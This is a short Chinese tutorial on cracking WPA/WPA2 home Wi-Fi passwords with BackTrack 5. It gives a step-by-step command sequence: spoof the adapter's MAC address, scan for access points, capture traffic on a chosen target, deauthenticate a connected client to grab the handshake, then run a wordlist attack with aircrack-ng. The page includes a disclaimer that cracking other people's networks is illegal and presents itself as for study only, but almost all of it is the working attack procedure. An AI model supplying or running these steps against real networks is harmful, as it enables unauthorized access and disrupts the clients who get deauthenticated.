破解无线网络的WPA/WPA2-PSK的密码比起wep难很多, 越来越多的人放弃WEP加密方式而是用更安全的WPA和WPA2加密家庭wifi. 许多人安装BackTrack也是为了要破解密码, 然而破解WPA/WPA2需要的不只是时间, 还需要运气.
本站不提倡破解无线网络密码, 破解他人AP的密码是违法的行为. 下面的教程仅作学习参考!
首先下载BT5的光盘候用BT5开机, 进入桌面环境.
首先先修改网卡的MAC地址, 下面例子的网卡名称为wlan0:
airmon-ng stop wlan0
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
开始搜索无线wifi的ap:
airodump-ng wlan0
找到多个AP之后, 找到需要破解密码的ap的bssid和频道(CH :*)
继续下面的命令:
airodump-ng -c (填入CH值) -w key –bssid (要破解的BSSID) wlan0
执行上面的命令之后就能看到有多少台电脑连接了目标AP, 用其中一台电脑的MAC地址执行下面命令:
aireplay-ng -0 10 -a (BSSID) -c (电脑的MAC地址) wlan0
上面的步骤一定要重复执行知道出现"WAP Handshake"才算成功, 如果已经看到了"Handshake"字样, 就可以跑字典了:
aircrack-ng -w (字典文件) -b (BSSID) key
字典文件就不附上了, 网络上有许多不同的字典可以下载, 小道几M, 大到几十个G都有. 什么时候能跑完字典就看电脑的性能和自己的运气了.